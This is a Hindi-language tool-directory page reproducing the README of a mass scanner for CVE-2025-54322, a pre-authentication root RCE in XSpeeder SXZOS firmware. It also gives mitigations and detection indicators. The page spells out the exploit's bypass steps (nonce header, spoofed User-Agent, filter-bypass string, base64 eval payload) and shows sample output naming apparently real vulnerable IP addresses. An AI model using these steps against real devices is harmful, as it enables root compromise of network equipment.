Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-54322 — CVE-2025-54322 - XSpeeder SXZOS प्री-ऑथ RCE 0day फाइंडर क्विक | Kitploit
उपकरण/GitHubGitHub/sachinart/cve-2025-54322
टोहीभेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubsachinart/cve-2025-54322

CVE-2025-54322

CVE-2025-54322 - XSpeeder SXZOS प्री-ऑथ RCE 0day फाइंडर क्विक

रिपॉजिटरी देखें
8218 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-54322 - XSpeeder SXZOS प्री-प्रमाणीकरण आरसीई स्कैनर

License Python CVE

CVE-2025-54322 के लिए एक मल्टी-थ्रेडेड कमजोरी स्कैनर, जो XSpeeder SXZOS फर्मवेयर में एक अप्रमाणित रिमोट कोड निष्पादन कमजोरी है, जो वैश्विक स्तर पर ~70,000+ होस्ट्स को प्रभावित करती है।

📋 विषय सूची

  • कमजोरी के बारे में
  • विशेषताएँ
  • स्थापना
  • उपयोग
  • आउटपुट
  • अस्वीकरण
  • श्रेय
  • लेखक

🔍 कमजोरी के बारे में

CVE-2025-54322 XSpeeder SXZOS फर्मवेयर में खोजी गई एक गंभीर प्री-प्रमाणीकरण रिमोट कोड निष्पादन कमजोरी है, जो SD-WAN उपकरणों, राउटरों और एज नेटवर्किंग उपकरणों को संचालित करता है।

कमजोरी का विवरण

  • CVE ID: CVE-2025-54322
  • विक्रेता: XSpeeder (चीनी नेटवर्किंग विक्रेता)
  • प्रभावित उत्पाद: SXZOS फर्मवेयर
  • कमजोरी का प्रकार: प्री-प्रमाणीकरण रिमोट कोड निष्पादन (RCE)
  • CVSS स्कोर: 9.8+ (गंभीर)
  • हमला वेक्टर: नेटवर्क
  • आवश्यक विशेषाधिकार: कोई नहीं
  • उपयोगकर्ता सहभागिता: कोई नहीं
  • प्रभाव: रूट विशेषाधिकारों के साथ पूर्ण सिस्टम समझौता

तकनीकी विवरण

कमजोरी SXZOS फर्मवेयर के Django-आधारित वेब इंटरफ़ेस में मौजूद है:

  1. कमजोर एंडपॉइंट: /?title=ABC&oIp=XXX&chkid=[base64_payload]
  2. मूल कारण: Python के eval() फ़ंक्शन का base64-डिकोडेड उपयोगकर्ता इनपुट पर असुरक्षित उपयोग
  3. प्रमाणीकरण: कोई आवश्यकता नहीं (प्री-प्रमाणीकरण)
  4. निष्पादन संदर्भ: रूट विशेषाधिकार
  5. प्रभावित होस्ट्स: वैश्विक स्तर पर ~70,000+ सार्वजनिक रूप से सुलभ उपकरण

हमला प्रवाह

root@kitploit:~
1. Calculate time-based nonce for X-SXZ-R header
2. Warm up session via /webInfos/ endpoint
3. Craft malicious payload with bypass string (#sUserCodexsPwd)
4. Base64 encode payload
5. Send exploit with exactly 3 query parameters
6. Server decodes and evaluates payload
7. Commands execute with root privileges

बाईपास तंत्र

यह शोषण कई सुरक्षा परतों को बायपास करता है:

  • Nginx User-Agent जांच: SXZ/2.3 के साथ जाली
  • समय-आधारित नॉन्स: गणना किया गया हेडर X-SXZ-R: [0-6]
  • सत्र आवश्यकता: /webInfos/ के माध्यम से वार्म किया गया
  • स्ट्रिंग फिल्टर: #sUserCodexsPwd टिप्पणी के साथ बायपास
  • पैरामीटर गणना: बिल्कुल 3 क्वेरी पैरामीटर बनाए रखता है

✨ विशेषताएँ

  • ✅ मल्टी-थ्रेडेड स्कैनिंग - एक साथ कई लक्ष्यों का परीक्षण
  • ✅ SSL बाईपास - स्व-हस्ताक्षरित और अमान्य प्रमाणपत्रों को संभालता है
  • ✅ स्मार्ट रीट्री लॉजिक - प्रति लक्ष्य 2 पुनः प्रयास
  • ✅ स्वच्छ आउटपुट - केवल कमजोर होस्ट दिखाता है
  • ✅ रीयल-टाइम फ़ाइल लेखन - तुरंत vuln-confirm.txt में परिणाम सहेजता है
  • ✅ प्रगति ट्रैकिंग - प्रत्येक 50 होस्ट पर लाइव प्रगति अपडेट
  • ✅ थ्रेड-सुरक्षित संचालन - सुरक्षित समवर्ती फ़ाइल और कंसोल संचालन
  • ✅ सटीक पहचान - कमांड निष्पादन का Regex-आधारित सत्यापन
  • ✅ PoC-मिलान तर्क - मूल शोषण पद्धति का अनुसरण करता है

🚀 स्थापना

पूर्वापेक्षाएँ

  • Python 3.7 या उच्चतर
  • pip पैकेज प्रबंधक

सेटअप

root@kitploit:~
# रिपॉजिटरी क्लोन करें
git clone https://github.com/Sachinart/CVE-2025-54322.git
cd CVE-2025-54322

# आवश्यक निर्भरताएँ स्थापित करें
pip install -r requirements.txt

निर्भरताएँ

requirements.txt फ़ाइल बनाएँ:

root@kitploit:~
requests>=2.31.0
urllib3>=2.0.0

📖 उपयोग

मूल उपयोग

root@kitploit:~
python3 scanner.py targets.txt

उन्नत उपयोग

root@kitploit:~
# कस्टम थ्रेड काउंट के साथ स्कैन करें (डिफ़ॉल्ट: 10)
python3 scanner.py targets.txt 20

# तेज़ परिणामों के लिए अधिकतम थ्रेड के साथ स्कैन करें
python3 scanner.py targets.txt 50

# रूढ़िवादी थ्रेड काउंट के साथ स्कैन करें
python3 scanner.py targets.txt 5

लक्ष्य फ़ाइल प्रारूप

एक targets.txt फ़ाइल बनाएँ जिसमें प्रति पंक्ति एक लक्ष्य हो:

root@kitploit:~
https://192.168.1.100:4433
https://10.0.0.50:8443
https://example.com:4433
http://vulnerable-device.local

उदाहरण सत्र

root@kitploit:~
$ python3 scanner.py targets.txt 20

╔═══════════════════════════════════════════════════════════════╗
║     XSpeeder SXZOS (CVE-2025-54322) RCE Scanner              ║
║     Pre-Auth Root RCE Vulnerability Checker                   ║
║     Showing: VULNERABLE HOSTS ONLY                            ║
╚═══════════════════════════════════════════════════════════════╝

[*] Loaded 2338 targets from targets.txt
[*] Using 20 concurrent threads
[*] Vulnerable hosts will be saved to: vuln-confirm.txt
[*] Starting scan...

======================================================================
[+] VULNERABLE: https://27.40.80.93:4433
[+] Status: VULNERABLE - RCE Confirmed
[+] HTTP Status: 500
[+] Output: uid=0(root) gid=0(root)
======================================================================

[*] Progress: 50/2338 | Found: 12 vulnerable
[*] Progress: 100/2338 | Found: 24 vulnerable

======================================================================
[*] SCAN COMPLETE
======================================================================
[*] Total Time: 890.45 seconds
[*] Total Targets Scanned: 2338
[*] Vulnerable Hosts Found: 156
[*] Success Rate: 6.67%
======================================================================

📊 आउटपुट

कंसोल आउटपुट

स्कैनर प्रदर्शित करता है:

  • कमजोर होस्ट की रीयल-टाइम खोज
  • प्रत्येक 50 होस्ट पर प्रगति अपडेट
  • आँकड़ों के साथ अंतिम सारांश
  • स्वच्छ, व्यवस्थित परिणाम

फ़ाइल आउटपुट (vuln-confirm.txt)

root@kitploit:~
XSpeeder SXZOS CVE-2025-54322 - Vulnerable Hosts
Scan started: 2025-12-27 15:30:45
======================================================================

https://27.40.80.93:4433
Status: VULNERABLE - RCE Confirmed
Output: uid=0(root) gid=0(root)
----------------------------------------------------------------------
https://27.40.83.189:4433
Status: VULNERABLE - RCE Confirmed
Output: uid=0(root) gid=0(root)
----------------------------------------------------------------------

======================================================================
Scan completed: 2025-12-27 15:45:30
Total scanned: 2338
Vulnerable: 156
Time taken: 890.45 seconds

🎯 थ्रेड अनुशंसाएँ

⚠️ अस्वीकरण

यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।

कानूनी नोटिस

  • केवल उन्हीं सिस्टमों का परीक्षण करें जिनके आप मालिक हैं या जिनके लिए आपके पास स्पष्ट लिखित अनुमति है।
  • कंप्यूटर सिस्टमों तक अनधिकृत पहुंच अधिकांश न्यायक्षेत्रों में अवैध है।
  • लेखक इस उपकरण के दुरुपयोग के लिए कोई देयता नहीं मानता।
  • इस उपकरण का उपयोग करके, आप इसका जिम्मेदारीपूर्ण और नैतिक उपयोग करने के लिए सहमत हैं।
  • यह उपकरण केवल सुरक्षा अनुसंधान और प्रवेश परीक्षण के लिए है।

जिम्मेदार प्रकटीकरण

यदि आप कमजोर सिस्टम खोजते हैं:

  1. कमजोरी की पुष्टि करने के अलावा शोषण न करें।
  2. तुरंत सिस्टम मालिक को परिणामों की रिपोर्ट करें।
  3. सुधार के लिए उचित समय दें।
  4. विशिष्ट कमजोर होस्ट को सार्वजनिक रूप से प्रकट न करें।

नैतिक उपयोग

  • करें: अधिकृत प्रवेश परीक्षण के लिए उपयोग करें
  • करें: अनुमति के साथ सुरक्षा अनुसंधान के लिए उपयोग करें
  • करें: कमजोरियों की जिम्मेदारीपूर्वक रिपोर्ट करें
  • न करें: अनधिकृत पहुंच के लिए उपयोग करें
  • न करें: दुर्भावनापूर्ण उद्देश्यों के लिए उपयोग करें
  • न करें: कमजोर सिस्टम को सार्वजनिक रूप से उजागर करें

🛡️ शमन

सिस्टम प्रशासकों के लिए

यदि आप XSpeeder SXZOS उपकरणों का प्रबंधन करते हैं:

  1. प्रभावित उपकरणों को तुरंत सार्वजनिक इंटरनेट से अलग करें
  2. एक्सपोज़र को सीमित करने के लिए नेटवर्क विभाजन लागू करें
  3. शोषण प्रयासों को ब्लॉक करने के लिए WAF नियम तैनात करें
  4. समझौते के संकेतकों के लिए लॉग मॉनिटर करें
  5. फर्मवेयर अपडेट के लिए XSpeeder से संपर्क करें (प्रकाशन के अनुसार विक्रेता अनुत्तरदायी)
  6. यदि विक्रेता अनुत्तरदायी रहता है तो वैकल्पिक समाधानों पर विचार करें

पता लगाना

लॉग में इन संकेतकों की तलाश करें:

  • base64 पेलोड के साथ /?title=*&oIp=*&chkid=* के अनुरोध
  • User-Agent: SXZ/2.3
  • असामान्य X-SXZ-R हेडर
  • #sUserCodexsPwd युक्त base64 स्ट्रिंग्स
  • /webInfos/ के बाद रूट पथ के कई अनुरोध

अस्थायी कार्यसमाधान

root@kitploit:~
# Nginx नियम शोषण प्रयासों को ब्लॉक करने के लिए
location / {
    if ($args ~* "chkid=") {
        return 403;
    }
}

📚 संदर्भ

  • मूल प्रकटीकरण: pwn.ai - CVE-2025-54322 Zero-Day
  • NVD प्रविष्टि: CVE-2025-54322 (लंबित)
  • विक्रेता: XSpeeder (7+ महीनों के बाद अनुत्तरदायी)

🙏 श्रेय

मूल कमजोरी की खोज

यह कमजोरी pwn.ai द्वारा स्वायत्त रूप से खोजी गई थी - एक AI-संचालित सुरक्षा अनुसंधान प्लेटफ़ॉर्म।

  • खोज प्लेटफ़ॉर्म: pwn.ai
  • मूल प्रकटीकरण: pwn.ai ब्लॉग पोस्ट
  • खोज तिथि: प्रकाशन से 10+ महीने पहले pwn.ai एजेंटों द्वारा खोजा गया
  • प्रकटीकरण समयरेखा: विक्रेता के पास 7+ महीने का आउटरीच बिना किसी प्रतिक्रिया के

महत्वपूर्ण नोट: यह पहली सार्वजनिक रूप से दस्तावेज़ित एजेंट-पाई गई, दूर से शोषण योग्य शून्य-दिवस RCE कमजोरी है।

👨‍💻 लेखक

Chirag Artani

  • 🌐 वेबसाइट: https://3rag.com
  • 🔐 सुरक्षा शोधकर्ता और प्रवेश परीक्षक

स्कैनर के बारे में

यह स्कैनर कार्यान्वयन सुरक्षा पेशेवरों की सहायता के लिए बनाया गया था:

  • अपने नेटवर्क में कमजोर XSpeeder SXZOS उपकरणों की पहचान करना
  • अधिकृत प्रवेश परीक्षण कार्यों का संचालन करना
  • पैच तैनाती की प्रभावशीलता का सत्यापन करना
  • सुरक्षा अनुसंधान और जागरूकता

📄 लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।

🤝 योगदान

योगदान का स्वागत है! कृपया बेझिझक पुल रिक्वेस्ट सबमिट करें।

दिशानिर्देश

  1. PEP 8 शैली दिशानिर्देशों का पालन करें
  2. जटिल तर्क के लिए टिप्पणियाँ जोड़ें
  3. सबमिट करने से पहले अच्छी तरह से परीक्षण करें
  4. आवश्यकतानुसार दस्तावेज़ीकरण अपडेट करें
  5. केवल नैतिक उपयोग मामलों को सुनिश्चित करें

📞 सहायता

प्रश्नों, मुद्दों या सुझावों के लिए:

  • GitHub पर एक मुद्दा खोलें
  • https://3rag.com पर जाएँ
  • जिम्मेदार प्रकटीकरण प्रथाओं का पालन करें

याद रखें: बड़ी शक्ति के साथ बड़ी जिम्मेदारी आती है। इस उपकरण का नैतिक और कानूनी रूप से उपयोग करें।

सुरक्षित रहें। नैतिक रहें। कानूनी रहें।

टूल डाउनलोड करें
लक्ष्य संख्याअनुशंसित थ्रेडअपेक्षित समय
1-105 threads~1-2 मिनट
10-5010 threads~3-5 मिनट
50-10020 threads~5-10 मिनट
100-50030 threads~10-20 मिनट
500+40-50 threads~20+ मिनट